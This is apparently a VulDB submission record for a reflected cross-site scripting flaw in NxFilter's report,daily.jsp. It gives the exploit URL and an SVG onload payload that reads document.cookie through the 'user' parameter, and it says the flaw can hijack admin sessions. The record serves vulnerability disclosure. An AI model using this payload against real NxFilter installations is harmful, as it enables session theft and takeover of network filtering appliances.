| Titel | Reflected XSS in NXFILTER |
|---|
| Beschreibung | A reflected xss in NXFILTER was found in https://IP_ADDRESS/report,daily.jsp?stime=2023%2F07%2F12&timeOption=yesterday&user=aaaaa%22%3E%3Csvg%20onload=alert(document.cookie)%20%3C/svg%3E
Payload: "><svg onload=alert(document.cookie) >
Nxfilter version: x.x.x.x
This can hijack admin sessions and cause terrible damage, as nxfilter works as an internet traffic controller.
Vulnerable page: https://IP_ADDRESS/report,daily.jsp |
|---|
| Quelle | ⚠️ https://www.warp2search.net/story/nxfilter-4325/ |
|---|
| Benutzer | 0xgordo (UID 50709) |
|---|
| Einreichung | 13.07.2023 14:57 (vor 3 Jahren) |
|---|
| Moderieren | 22.07.2023 08:23 (9 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 235191 [NxFilter 4.3.2.5 Benutzer Cross Site Scripting] |
|---|
| Punkte | 20 |
|---|